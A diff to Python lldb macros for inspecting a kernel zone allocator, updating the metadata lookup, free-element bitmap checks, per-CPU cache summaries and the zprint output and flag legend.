+        def load_range(var):
+            return (unsigned(var.min_address), unsigned(var.max_address))
+
+        def in_range(x, r):
+            return x >= r[0] and x <= r[1]
+
+        FOREIGN = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_FOREIGN')
+        NATIVE  = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_NATIVE')
+
+        self.meta_range = load_range(zone_info.zi_meta_range)
+        self.native_range = load_range(zone_info.zi_map_range[NATIVE])
+        self.foreign_range = load_range(zone_info.zi_map_range[FOREIGN])
+        self.addr_base = min(self.foreign_range[0], self.native_range[0])
 
         addr = unsigned(addr)
         if isPageIndex:
@@ -255,86 +267,146 @@ class ZoneMeta(object):
 
         self.address = addr
 
-        if self.zone_meta_min <= addr and addr < self.zone_meta_max:
+        if in_range(addr, self.meta_range):
             self.kind = 'Metadata'
-            addr -= (addr - self.zone_meta_min) % sizeof('struct zone_page_metadata')
+            addr -= addr % sizeof('struct zone_page_metadata')
             self.meta_addr = addr
             self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
 
-            self.page_addr = self.zone_map_min + ((addr - self.zone_meta_min) / sizeof('struct zone_page_metadata') * pagesize)
-            self.first_offset = 0
-        elif self.zone_map_min <= addr and addr < self.zone_map_max:
+            self.page_addr = self.addr_base + ((addr - self.meta_range[0]) / sizeof('struct zone_page_metadata') * pagesize)
+        elif in_range(addr, self.native_range) or in_range(addr, self.foreign_range):
             addr &= ~(pagesize - 1)
-            page_idx = (addr - self.zone_map_min) / pagesize
+            page_idx = (addr - self.addr_base) / pagesize
 
             self.kind = 'Element'
             self.page_addr = addr
-            self.meta_addr = self.zone_meta_min + page_idx * sizeof('struct zone_page_metadata')
+            self.meta_addr = self.meta_range[0] + page_idx * sizeof('struct zone_page_metadata')
             self.meta = kern.GetValueFromAddress(self.meta_addr, "struct zone_page_metadata *")
-            self.first_offset = 0
-        elif ZoneMeta._looksForeign(addr):
-            self.kind = 'Element (F)'
-            addr &= ~(pagesize - 1)
-            self.page_addr = addr
-            self.meta_addr = addr
-            self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
-            self.first_offset = 32 # ZONE_FOREIGN_PAGE_FIRST_OFFSET in zalloc.c
         else:
             self.kind = 'Unknown'
             self.meta = None
             self.page_addr = 0
             self.meta_addr = 0
-            self.first_offset = 0
+
+        if self.meta:
+            self.zone = addressof(kern.globals.zone_array[self.meta.zm_index])
+        else:
+            self.zone = None
 
     def isSecondaryPage(self):
-        return self.meta and self.meta.zm_secondary_page
+        return self.meta and self.meta.zm_chunk_len >= 0xe
 
     def getPageCount(self):
-        return self.meta and self.meta.zm_page_count or 0
+        n = self.meta and self.meta.zm_chunk_len or 0
+        if self.zone and self.zone.z_percpu:
+            n *= kern.globals.zpercpu_early_count
+        return n
+
+    def getAllocAvail(self):
+        if not self.meta: return 0
+        chunk_len = unsigned(self.meta.zm_chunk_len)
+        page_size = unsigned(kern.globals.page_size)
+        return chunk_len * page_size / self.zone.z_elem_size
 
     def getAllocCount(self):
-        return self.meta and self.meta.zm_alloc_count or 0
+        if not self.meta: return 0
+        return self.meta.zm_alloc_size / self.zone.z_elem_size
 
     def getReal(self):
         if self.isSecondaryPage():
-            return ZoneMeta(self.meta - self.meta.zm_page_count)
+            return ZoneMeta(unsigned(self.meta) - sizeof('struct zone_page_metadata') * unsigned(self.meta.zm_page_index))
 
         return self
 
-    def getFreeList(self):
-        if self.meta and self.meta.zm_freelist_offs != unsigned(0xffff):
-            return kern.GetValueFromAddress(self.page_addr + self.meta.zm_freelist_offs, 'vm_offset_t *')
-        return 0
+    def getElementAddress(self, addr):
+        meta  = self.getReal()
+        esize = meta.zone.z_elem_size
+        start = meta.page_addr
 
-    def iterateFreeList(self):
-        cur = self.getFreeList()
-        while cur:
-            yield cur
+        if esize == 0:
+            return None
+
+        estart = addr - start
+        return unsigned(start + estart - (estart % esize))
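+
+    # For example, with z_elem_size == 48, an address 0x65 bytes into the
+    # chunk maps back to the element starting at offset 0x60 (96 = 101 - 101 % 48).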
+
+    def getInlineBitmapChunkLength(self):
+        if self.zone.z_percpu:
+            return unsigned(self.zone.z_chunk_pages)
+        return unsigned(self.meta.zm_chunk_len)
+
+    def getBitmapSize(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return 0
+        if self.meta.zm_inline_bitmap:
+            return -4 * self.getInlineBitmapChunkLength()
+        return 8 << (unsigned(self.meta.zm_bitmap) & 0x7);
+
+    def getBitmap(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return 0
+        if self.meta.zm_inline_bitmap:
+            return unsigned(addressof(self.meta.zm_bitmap))
+        bbase = unsigned(kern.globals.zone_info.zi_bits_range.min_address)
+        index = unsigned(self.meta.zm_bitmap) & ~0x7
+        return bbase + index;
+
+    def getFreeCountSlow(self):
+        if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len:
+            return self.getAllocAvail() - self.getAllocCount()
+
+        n = 0
+        if self.meta.zm_inline_bitmap:
+            for i in xrange(0, self.getInlineBitmapChunkLength()):
+                m = kern.GetValueFromAddress(self.meta_addr + i * 16,
+                    'struct zone_page_metadata *');
+                bits = unsigned(m.zm_bitmap)
+                while bits:
+                    n += 1
+                    bits &= bits - 1
+        else:
+            bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *')
+            for i in xrange(0, 1 << (unsigned(self.meta.zm_bitmap) & 0x7)):
+                bits = unsigned(bitmap[i])
+                while bits:
+                    n += 1
+                    bits &= bits - 1
+        return n
+
+    def isElementFree(self, addr):
+        meta = self.meta
+
+        if not meta or self.zone.z_permanent or not meta.zm_chunk_len:
+            return True
+
+        start = self.page_addr
+        esize = self.zone.z_elem_size
+        eidx  = (addr - start) / esize
+
+        if meta.zm_inline_bitmap:
+            i = eidx / 32
+            m = unsigned(meta) + sizeof('struct zone_page_metadata') * i
+            bits = kern.GetValueFromAddress(m, meta).zm_bitmap
+            return (bits & (1 << (eidx % 32))) != 0
 
-            cur = dereference(cast(cur, 'vm_offset_t *'))
-            cur = unsigned(cur) ^ unsigned(kern.globals.zp_nopoison_cookie)
-            cur = kern.GetValueFromAddress(cur, 'vm_offset_t *')
+        else:
+            bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *')
+            bits = unsigned(bitmap[eidx / 64])
+            return (bits & (1 << (eidx % 64))) != 0
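+
+    # Note on getFreeCountSlow()/isElementFree(): these helpers treat a set
+    # bit in zm_bitmap as a free element, so the `bits &= bits - 1` loops
+    # above count set bits (Kernighan's trick) and the bit test reports "free".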
 
     def iterateElements(self):
         if self.meta is None:
             return
-        esize = self.getZone().z_elem_size
-        offs  = self.first_offset
-        end   = kern.globals.page_size
-        if not self.meta.zm_percpu:
-            end *= self.meta.zm_page_count
+        esize = self.zone.z_elem_size
+        start = 0
+        end   = unsigned(kern.globals.page_size) * self.meta.zm_chunk_len
+        end  -= end % esize
 
-        while offs + esize <= end:
-            yield kern.GetValueFromAddress(self.page_addr + offs, 'void *')
-            offs += esize
-
-    def getZone(self):
-        if self.meta:
-            return kern.globals.zone_array[self.meta.zm_index]
-        return None
+        for offs in xrange(start, end, esize):
+            yield unsigned(self.page_addr + offs)
 
 @lldb_type_summary(['zone_page_metadata'])
-@header("{:<18s} {:<18s} {:>8s} {:>8s} {:<18s} {:<20s}".format('ZONE_METADATA', 'FREELIST', 'PG_CNT', 'ALLOC_CNT', 'ZONE', 'NAME'))
+@header("{:<20s} {:<10s} {:<10s} {:<24s} {:<20s} {:<20s}".format(
+    'METADATA', 'PG_CNT', 'ALLOC_CNT', 'BITMAP', 'ZONE', 'NAME'))
 def GetZoneMetadataSummary(meta):
     """ Summarize a zone metadata object
         params: meta - obj representing zone metadata in the kernel
@@ -346,66 +418,73 @@ def GetZoneMetadataSummary(meta):
 
     out_str = 'Metadata Description:\n' + GetZoneMetadataSummary.header + '\n'
     if meta.isSecondaryPage():
-        out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}\n".format(
-                meta.meta_addr, 0, 0, 0, 0, '(fake multipage meta)')
+        out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}\n".format(
+                meta.meta_addr, 0, 0, 0, 0, 0, '(fake multipage meta)')
         meta = meta.getReal()
-    zinfo = meta.getZone()
-    out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}".format(
-            meta.meta_addr, meta.getFreeList(), meta.getPageCount(), meta.getAllocCount(),
-            addressof(zinfo), ZoneName(zinfo))
+    out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}".format(
+            meta.meta_addr, meta.getPageCount(), meta.getAllocCount(),
+            meta.getBitmap(), meta.getBitmapSize(), meta.zone, ZoneName(meta.zone))
     return out_str
 
-@header("{:<18s} {:>10s}  {:>18s}  {:>18s} {:<10s}".format(
-    'ADDRESS', 'TYPE', 'METADATA', 'PAGE_ADDR', 'OFFSET'))
+@header("{:<20s} {:<10s} {:<10s} {:<20s} {:<10s}".format(
+    'ADDRESS', 'TYPE', 'STATUS', 'PAGE_ADDR', 'OFFSET'))
 def WhatIs(addr):
     """ Information about kernel pointer
     """
     global kern
 
     meta = ZoneMeta(addr)
+    estart = None
 
     if meta.meta is None:
         out_str = "Address {:#018x} is outside of any zone map ({:#018x}-{:#018x})\n".format(
-                addr, meta.zone_map_min, meta.zone_map_max)
+                addr, meta.native_range[0], meta.native_range[-1] + 1)
     else:
         if meta.kind[0] == 'E': # element
             page_offset_str = "{:d}/{:d}K".format(
                     addr - meta.page_addr, kern.globals.page_size / 1024)
+            estart = meta.getElementAddress(addr)
+            if estart is None:
+                status = "Unattributed"
+            elif meta.isElementFree(estart):
+                status = "Free"
+            else:
+                status = "Allocated"
         else:
             page_offset_str = "-"
+            status = "-"
         out_str = WhatIs.header + '\n'
-        out_str += "{meta.address:#018x} {meta.kind:>10s}  {meta.meta_addr:#018x}  {meta.page_addr:#018x} {:<10s}\n\n".format(
-                page_offset_str, meta=meta)
+        out_str += "{meta.address:<#20x} {meta.kind:<10s} {status:<10s} {meta.page_addr:<#20x} {:<10s}\n\n".format(
+                page_offset_str, meta=meta, status=status)
         out_str += GetZoneMetadataSummary(meta) + '\n\n'
 
     print out_str
 
-    if meta.kind[0] == 'E':
+    if estart is not None:
         print "Hexdump:\n"
 
-        meta  = meta.getReal()
-        esize = meta.getZone().z_elem_size
-        start = meta.page_addr
-
-        estart = addr - (start - meta.first_offset)
-        estart = start + estart - (estart % esize)
+        meta   = meta.getReal()
+        esize  = meta.zone.z_elem_size
+        start  = meta.page_addr
+        marks  = {unsigned(addr): ">"}
 
         try:
             if estart > start:
                 data_array = kern.GetValueFromAddress(estart - 16, "uint8_t *")
                 print_hex_data(data_array[0:16], estart - 16, "")
-                print "------------------------------------------------------------------"
         except:
             pass
 
+        print "------------------------------------------------------------------"
         try:
             data_array = kern.GetValueFromAddress(estart, "uint8_t *")
-            print_hex_data(data_array[0:esize], estart, "")
+            print_hex_data(data_array[0:esize], estart, "", marks)
         except:
+            print "*** unable to read memory ***"
             pass
+        print "------------------------------------------------------------------"
 
         try:
-            print "------------------------------------------------------------------"
             data_array = kern.GetValueFromAddress(estart + esize, "uint8_t *")
             print_hex_data(data_array[0:16], estart + esize, "")
         except:
@@ -423,97 +502,80 @@ def WhatIsHelper(cmd_args=None):
 # Macro: showzcache
 
 @lldb_type_summary(['zone','zone_t'])
-@header("{:<18s}  {:>5s}   {:>10s}  {:>12s} {:>12s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s}  {:<20s}".format(
-'ZONE', 'ELTS', 'D FULL/EMPTY', 'ALLOCS', 'FREES', 'D_SWAP', 'D_FILL', 'D_DRAIN', 'D_GC', 'D_FAIL', 'NAME'))
-
-def GetZoneCacheSummary(zone, O):
-    """ Summarize a zone's cache with important information.
-        params:
-          zone: value - obj representing a zone in kernel
-        returns:
-          str - summary of the zone's cache contents
-    """
-    format_string = '{:#018x}  {:>5d}    {:>4d} / {:>4d}  {:>12,d} {:>12,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d}  {:<20s}'
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
-    depot_capacity = kern.GetGlobalVariable('depot_element_count')
-
-    cache_elem_count = 0
-    allocs = 0
-    frees  = 0
-
-    if zone.__getattr__('cpu_cache_enabled') :
-        for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            cache_elem_count += cache.current.zcc_magazine_index
-            cache_elem_count += cache.previous.zcc_magazine_index
-            allocs += cache.zcc_allocs
-            frees  += cache.zcc_frees
-
-        depot = zone.zcache.zcc_depot
-        cache_elem_count += depot.zcc_depot_index * mag_capacity
-        print O.format(format_string, zone, cache_elem_count,
-                depot.zcc_depot_index, depot_capacity - depot.zcc_depot_index,
-                allocs, frees, depot.zcc_swap, depot.zcc_fill, depot.zcc_drain,
-                depot.zcc_gc, depot.zcc_fail, ZoneName(zone))
-
-@lldb_command('showzcache', fancy=True)
-def ZcachePrint(cmd_args=None, cmd_options={}, O=None):
-    """ Routine to print a summary listing of all the kernel zones cache contents
-    All columns are printed in decimal
-    """
-    global kern
-    with O.table(GetZoneCacheSummary.header):
-        for zval in kern.zones:
-            if zval.__getattr__('cpu_cache_enabled') :
-                GetZoneCacheSummary(zval, O)
-
-# EndMacro: showzcache
-
-# Macro: showzcachecpu
-
-@lldb_type_summary(['zone','zone_t'])
-@header("{:18s}  {:32s}  {:<10s}  {:<10s}".format(
-'ZONE', 'NAME', 'CACHE_ELTS', 'CPU_INFO'))
-
-def GetZoneCacheCPUSummary(zone, O):
+@header("{:18s}  {:32s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:>6s}  {:<s}".format(
+    'ZONE', 'NAME', 'WSS', 'CONT', 'USED', 'FREE', 'CACHED', 'RECIRC', 'CPU_CACHES'))
+def GetZoneCacheCPUSummary(zone, verbose, O):
     """ Summarize a zone's cache broken up per cpu
         params:
           zone: value - obj representing a zone in kernel
         returns:
           str - summary of the zone's per CPU cache contents
     """
-    format_string = '{:#018x}  {:32s}  {:10d}  {cpuinfo:s}'
+    format_string  = '{zone:#018x}  {:32s}  '
+    format_string += '{zone.z_elems_free_wss:6d}  {cont:6.2f}  '
+    format_string += '{used:6d}  {zone.z_elems_free:6d}  '
+    format_string += '{cached:6d}  {recirc:6d}  {cpuinfo:s}'
     cache_elem_count = 0
     cpu_info = ""
-    per_cpu_count = 0
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
+    mag_capacity = unsigned(kern.GetGlobalVariable('zc_magazine_size'))
     depot_capacity = kern.GetGlobalVariable('depot_element_count')
 
-    if zone.__getattr__('cpu_cache_enabled') :
-        i = 0
-        for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            if i is not 0:
-                cpu_info += ", "
-            per_cpu_count = cache.current.zcc_magazine_index
-            per_cpu_count += cache.previous.zcc_magazine_index
-            cache_elem_count += per_cpu_count
-            cpu_info += "CPU {:d}: {:5}".format(i,per_cpu_count)
-            i += 1
-        cache_elem_count += zone.zcache.zcc_depot.zcc_depot_index * mag_capacity
-
-    print O.format(format_string, zone, ZoneName(zone), cache_elem_count,cpuinfo = cpu_info)
+    if zone.z_pcpu_cache:
+        if verbose:
+            cpu_info = None
+            for cache in IterateZPerCPU(zone.z_pcpu_cache):
+                if cpu_info is None:
+                    cpu_info = "{ "
+                else:
+                    cpu_info += ", "
+                per_cpu_count = unsigned(cache.zc_alloc_cur)
+                per_cpu_count += unsigned(cache.zc_free_cur)
+                per_cpu_count += unsigned(cache.zc_depot_cur) * mag_capacity
+                cache_elem_count += per_cpu_count
+                cpu_info += "{:3d} /{cache.zc_depot_max:3d}".format(per_cpu_count, cache=cache)
+            cpu_info += " }"
+        else:
+            depot_cur = 0
+            depot_max = 0
+            for cache in IterateZPerCPU(zone.z_pcpu_cache):
+                depot_cur += unsigned(cache.zc_alloc_cur)
+                depot_cur += unsigned(cache.zc_free_cur)
+                cache_elem_count += unsigned(cache.zc_depot_cur) * mag_capacity
+                depot_max += unsigned(cache.zc_depot_max)
+            cache_elem_count += depot_cur
+
+            cpus = unsigned(kern.globals.zpercpu_early_count)
+            cpu_info = "total: {:3d} / {:3d}, avg: {:5.1f} / {:5.1f}".format(
+                    depot_cur, depot_max, float(depot_cur) / cpus, float(depot_max) / cpus)
+
+
+    print O.format(format_string, ZoneName(zone), cached=cache_elem_count,
+            used=zone.z_elems_avail - cache_elem_count - zone.z_elems_free,
+            cont=float(zone.z_contention_wma) / 256.,
+            recirc=zone.z_recirc_cur * mag_capacity,
+            zone=zone, cpuinfo = cpu_info)
 
-@lldb_command('showzcachecpu', fancy=True)
+@lldb_command('showzcache', fancy=True)
 def ZcacheCPUPrint(cmd_args=None, cmd_options={}, O=None):
-    """ Routine to print a summary listing of all the kernel zones cache contents
-    All columns are printed in decimal
+    """
+    Routine to print a summary listing of every kernel zone's cache contents
+
+    Usage: showzcache [-V]
+
+    Use -V       to see more detailed output
     """
     global kern
+    verbose = "-V" in cmd_options
     with O.table(GetZoneCacheCPUSummary.header):
-        for zval in kern.zones:
-            if zval.__getattr__('cpu_cache_enabled'):
-                GetZoneCacheCPUSummary(zval, O)
+        if len(cmd_args) == 1:
+            zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *')
+            GetZoneCacheCPUSummary(zone, verbose, O)
+        else:
+            for zval in kern.zones:
+                if zval.z_self:
+                    GetZoneCacheCPUSummary(zval, verbose, O)
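+
+# Example invocations from the lldb prompt (the zone address is hypothetical):
+#   (lldb) showzcache                          # one summary line per zone
+#   (lldb) showzcache -V 0xffffff80a1b2c300    # per-CPU detail for one zone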
 
-# EndMacro: showzcachecpu
+# EndMacro: showzcache
 
 # Macro: zprint
 
@@ -524,26 +586,41 @@ def GetZone(zone_val, marks):
         returns:
           zone - python dictionary with zone stats
     """
+    pcpu_scale = 1
+    if zone_val.z_percpu:
+        pcpu_scale = unsigned(kern.globals.zpercpu_early_count)
     pagesize = kern.globals.page_size
     zone = {}
-    zone["free_size"] = zone_val.countfree * zone_val.pcpu_elem_size
-    mag_capacity = kern.GetGlobalVariable('magazine_element_count')
-    zone["page_count"] = unsigned(zone_val.page_count)
-    zone["allfree_page_count"] = unsigned(zone_val.allfree_page_count)
+    mag_capacity = unsigned(kern.GetGlobalVariable('zc_magazine_size'))
+    zone["page_count"] = unsigned(zone_val.z_wired_cur) * pcpu_scale
+    zone["allfree_page_count"] = unsigned(zone_val.z_wired_empty)
+
+    cache_elem_count = 0
+    if zone_val.z_pcpu_cache:
+        for cache in IterateZPerCPU(zone_val.z_pcpu_cache):
+            cache_elem_count += unsigned(cache.zc_alloc_cur)
+            cache_elem_count += unsigned(cache.zc_free_cur)
+            cache_elem_count += unsigned(cache.zc_depot_cur) * mag_capacity
+
+    zone["size"] = zone["page_count"] * pagesize
 
-    zone["size"] = zone_val.page_count * pagesize
-    zone["used_size"] = zone["size"] - zone["free_size"]
-    zone["element_count"] = zone_val.countavail - zone_val.countfree
+    zone["free_size"] = zone_val.z_elems_free * zone_val.z_elem_size * pcpu_scale
+    zone["cached_size"] = cache_elem_count * zone_val.z_elem_size * pcpu_scale
+    zone["used_size"] = zone["size"] - zone["free_size"] - zone["cached_size"]
 
-    if zone_val.percpu:
+    zone["element_count"] = zone_val.z_elems_avail - zone_val.z_elems_free - cache_elem_count
+    zone["cache_element_count"] = cache_elem_count
+    zone["free_element_count"] = zone_val.z_elems_free
+
+    if zone_val.z_percpu:
         zone["allocation_size"] = unsigned(pagesize)
-        zone["allocation_ncpu"] = unsigned(zone_val.alloc_pages)
+        zone["allocation_ncpu"] = unsigned(zone_val.z_chunk_pages)
     else:
-        zone["allocation_size"] = unsigned(zone_val.alloc_pages * pagesize)
+        zone["allocation_size"] = unsigned(zone_val.z_chunk_pages * pagesize)
         zone["allocation_ncpu"] = 1
     zone["allocation_count"] = zone["allocation_size"] / zone_val.z_elem_size
     zone["allocation_waste"] = (zone["allocation_size"] % zone_val.z_elem_size) * zone["allocation_ncpu"]
-    
+
     if not zone_val.__getattr__("z_self") :
         zone["destroyed"] = True
     else:
@@ -555,30 +632,24 @@ def GetZone(zone_val, marks):
         else:
             zone[mark[0]] = False
 
-    cache_elem_count = 0
-    if zone_val.__getattr__('cpu_cache_enabled') :
-        for cache in IterateZPerCPU(zone_val.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'):
-            cache_elem_count += cache.current.zcc_magazine_index
-            cache_elem_count += cache.previous.zcc_magazine_index
-        cache_elem_count += zone_val.zcache.zcc_depot.zcc_depot_index * mag_capacity
-    zone["cache_element_count"] = cache_elem_count
     zone["name"] = ZoneName(zone_val)
     if zone_val.exhaustible:
         zone["exhaustible"] = True
     else:
         zone["exhaustible"] = False
 
-    zone["sequester_page_count"] = unsigned(zone_val.sequester_page_count)
-    zone["page_count_max"] = unsigned(zone_val.page_count_max)
+    zone["sequester_page_count"] = (unsigned(zone_val.z_va_cur) -
+            unsigned(zone_val.z_wired_cur)) * pcpu_scale
+    zone["page_count_max"] = unsigned(zone_val.z_wired_max) * pcpu_scale
 
     return zone
 
 
 @lldb_type_summary(['zone','zone_t'])
-@header(("{:<18s}  {:_^35s}  {:_^24s}  {:_^13s}  {:_^28s}\n"+
-"{:<18s}  {:>11s} {:>11s} {:>11s}  {:>8s} {:>7s} {:>7s}  {:>6s} {:>6s}  {:>8s} {:>6s} {:>5s} {:>7s}   {:<18s} {:<20s}").format(
+@header(("{:<18s}  {:_^47s}  {:_^24s}  {:_^13s}  {:_^28s}\n"+
+"{:<18s}  {:>11s} {:>11s} {:>11s} {:>11s}  {:>8s} {:>7s} {:>7s}  {:>6s} {:>6s}  {:>8s} {:>6s} {:>5s} {:>7s}   {:<18s} {:<20s}").format(
 '', 'SIZE (bytes)', 'ELEMENTS (#)', 'PAGES', 'ALLOC CHUNK CONFIG',
-'ZONE', 'TOTAL', 'ALLOC', 'FREE', 'ALLOC', 'FREE', 'CACHE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME'))
+'ZONE', 'TOTAL', 'ALLOC', 'CACHE', 'FREE', 'ALLOC', 'CACHE', 'FREE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME'))
 def GetZoneSummary(zone_val, marks, stats):
     """ Summarize a zone with important information. See help zprint for description of each field
         params:
@@ -590,16 +661,21 @@ def GetZoneSummary(zone_val, marks, stats):
     out_string = ""
     zone = GetZone(zone_val, marks)
 
-    format_string  = '{zone:#018x}  {cur_size:11,d} {used_size:11,d} {free_size:11,d}  '
-    format_string += '{count_elts:8,d} {zone.countfree:7,d} {cache_elem_count:7,d}  '
-    format_string += '{zone.page_count:6,d} {zone.allfree_page_count:6,d}  '
-    format_string += '{alloc_size_kb:3,d}K ({zone.alloc_pages:d}) {alloc_count:6,d} {alloc_waste:5,d} {zone.pcpu_elem_size:7,d}   '
+    pcpu_scale = 1
+    if zone_val.z_percpu:
+        pcpu_scale = unsigned(kern.globals.zpercpu_early_count)
+
+    format_string  = '{zone:#018x}  {zd[size]:11,d} {zd[used_size]:11,d} {zd[cached_size]:11,d} {zd[free_size]:11,d}  '
+    format_string += '{zd[element_count]:8,d} {zd[cache_element_count]:7,d} {zone.z_elems_free:7,d}  '
+    format_string += '{z_wired_cur:6,d} {z_wired_empty:6,d}  '
+    format_string += '{alloc_size_kb:3,d}K ({zone.z_chunk_pages:d}) '
+    format_string += '{zd[allocation_count]:6,d} {zd[allocation_waste]:5,d} {z_elem_size:7,d}   '
     format_string += '{markings:<18s} {zone_name:<20s}'
 
     markings=""
     if zone["destroyed"]:
         markings+="I"
-        
+
     for mark in marks:
         if zone[mark[0]]:
             markings += mark[1]
@@ -607,10 +683,11 @@ def GetZoneSummary(zone_val, marks, stats):
             markings+=" "
 
     alloc_size_kb = zone["allocation_size"] / 1024
-    out_string += format_string.format(zone=zone_val, free_size=zone["free_size"], used_size=zone["used_size"],
-            cur_size=zone["size"], count_elts=zone["element_count"], cache_elem_count=zone["cache_element_count"],
-            alloc_count=zone["allocation_count"], alloc_size_kb=alloc_size_kb, alloc_waste=zone["allocation_waste"],
-            markings=markings, zone_name=zone["name"])
+    out_string += format_string.format(zone=zone_val, zd=zone,
+            z_wired_cur=unsigned(zone_val.z_wired_cur) * pcpu_scale,
+            z_wired_empty=unsigned(zone_val.z_wired_empty) * pcpu_scale,
+            z_elem_size=unsigned(zone_val.z_elem_size) * pcpu_scale,
+            alloc_size_kb=alloc_size_kb, markings=markings, zone_name=zone["name"])
 
     if zone["exhaustible"] :
             out_string += " (max: {:d})".format(zone["page_count_max"] * pagesize)
@@ -620,6 +697,7 @@ def GetZoneSummary(zone_val, marks, stats):
 
     stats["cur_size"] += zone["size"]
     stats["used_size"] += zone["used_size"]
+    stats["cached_size"] += zone["cached_size"]
     stats["free_size"] += zone["free_size"]
     stats["cur_pages"] += zone["page_count"]
     stats["free_pages"] += zone["allfree_page_count"]
@@ -634,46 +712,50 @@ def Zprint(cmd_args=None, cmd_options={}, O=None):
                 Output json
     All columns are printed in decimal
     Legend:
+        ! - zone uses VA sequestering
+        $ - not encrypted during hibernation
+        A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv
         C - collectable
         D - destructible
-        X - expandable
-        $ - not encrypted during hibernation
-        H - exhaustible
+        E - Per-cpu caching is enabled for this zone
         F - allows foreign memory (memory not allocated from any zone map)
+        G - currently running GC
+        H - exhaustible
+        I - zone was destroyed and is no longer valid
+        L - zone is being monitored by zleaks
         M - gzalloc will avoid monitoring this zone
-        R - will be refilled when below low water mark
-        O - does not allow refill callout to fill zone on noblock allocation
         N - zone requires alignment (avoids padding this zone for debugging)
-        A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv
+        O - does not allow refill callout to fill zone on noblock allocation
+        R - will be refilled when below low water mark
         S - currently trying to allocate more backing memory from kernel_memory_allocate with VM priv
         W - another thread is waiting for more memory
-        E - Per-cpu caching is enabled for this zone
-        L - zone is being monitored by zleaks
-        G - currently running GC
-        I - zone was destroyed and is no longer valid
+        X - expandable
+        Z - elements are zeroed on free
     """
     global kern
 
     marks = [
             ["collectable",          "C"],
-            ["destructible",         "D"],
+            ["z_destructible",       "D"],
             ["expandable",           "X"],
-            ["noencrypt",            "$"],
+            ["z_noencrypt",          "$"],
             ["exhaustible",          "H"],
-            ["allows_foreign",       "F"],
-            ["prio_refill_count",    "R"],
+            ["z_allows_foreign",     "F"],
+            ["z_elems_rsv",          "R"],
             ["no_callout",           "O"],
             ["zleak_on",             "L"],
-            ["expanding_no_vm_priv", "A"],
-            ["expanding_vm_priv",    "S"],
-            ["waiting",              "W"],
-            ["cpu_cache_enabled",    "E"],
+            ["z_expander",           "A"],
+            ["z_expander_vm_priv",   "S"],
+            ["z_replenish_wait",     "W"],
+            ["z_pcpu_cache",         "E"],
             ["gzalloc_exempt",       "M"],
             ["alignment_required",   "N"],
-            ["va_sequester",         "!"]
+            ["z_va_sequester",       "!"],
+            ["z_free_zeroes",        "Z"]
             ]
+
     stats = {
-        "cur_size": 0, "used_size": 0, "free_size": 0,
+        "cur_size": 0, "used_size": 0, "cached_size": 0, "free_size": 0,
         "cur_pages": 0, "free_pages": 0, "seq_pages": 0
     }
 
@@ -694,7 +776,7 @@ def Zprint(cmd_args=None, cmd_options={}, O=None):
                 if zval.z_self:
                     print GetZoneSummary(zval, marks, stats)
 
-            format_string  = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[free_size]:11,d} '
+            format_string  = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[cached_size]:11,d} {stats[free_size]:11,d} '
             format_string += '                           '
             format_string += '{stats[cur_pages]:6,d} {stats[free_pages]:6,d}{VT.EndBold}  '
             format_string += '(sequester: {VT.Bold}{stats[seq_pages]:,d}{VT.EndBold})'
@@ -721,61 +803,7 @@ def TestZprint(kernel_target, config, lldb_obj, isConnected ):
 
 
 # EndMacro: zprint
-
-# Macro: showzfreelist
-
-def ShowZfreeListHeader(zone):
-    """ Helper routine to print a header for zone freelist.
-        (Since the freelist does not have a custom type, this is not defined as a Type Summary).
-        params:
-            zone:zone_t - Zone object to print header info
-        returns:
-            None
-    """
-
-    scaled_factor = (unsigned(kern.globals.zp_factor) +
-            (unsigned(zone.z_elem_size) >> unsigned(kern.globals.zp_scale)))
-
-    out_str = ""
-    out_str += "{0: <9s} {1: <12s} {2: <18s} {3: <18s} {4: <6s}\n".format('ELEM_SIZE', 'COUNT', 'NCOOKIE', 'PCOOKIE', 'FACTOR')
-    out_str += "{0: <9d} {1: <12d} 0x{2:0>16x} 0x{3:0>16x} {4: <2d}/{5: <2d}\n\n".format(
-                zone.z_elem_size, zone.countavail - zone.countfree, kern.globals.zp_nopoison_cookie, kern.globals.zp_poisoned_cookie, zone.zp_count, scaled_factor)
-    out_str += "{0: <7s} {1: <18s} {2: <18s} {3: <18s} {4: <18s} {5: <18s} {6: <14s}\n".format(
-                'NUM', 'ELEM', 'NEXT', 'BACKUP', '^ NCOOKIE', '^ PCOOKIE', 'POISON (PREV)')
-    print out_str
-
-def ShowZfreeListChain(zone, zfirst, zlimit):
-    """ Helper routine to print a zone free list chain
-        params:
-            zone: zone_t - Zone object
-            zfirst: void * - A pointer to the first element of the free list chain
-            zlimit: int - Limit for the number of elements to be printed by showzfreelist
-        returns:
-            None
-    """
-    current = Cast(zfirst, 'void *')
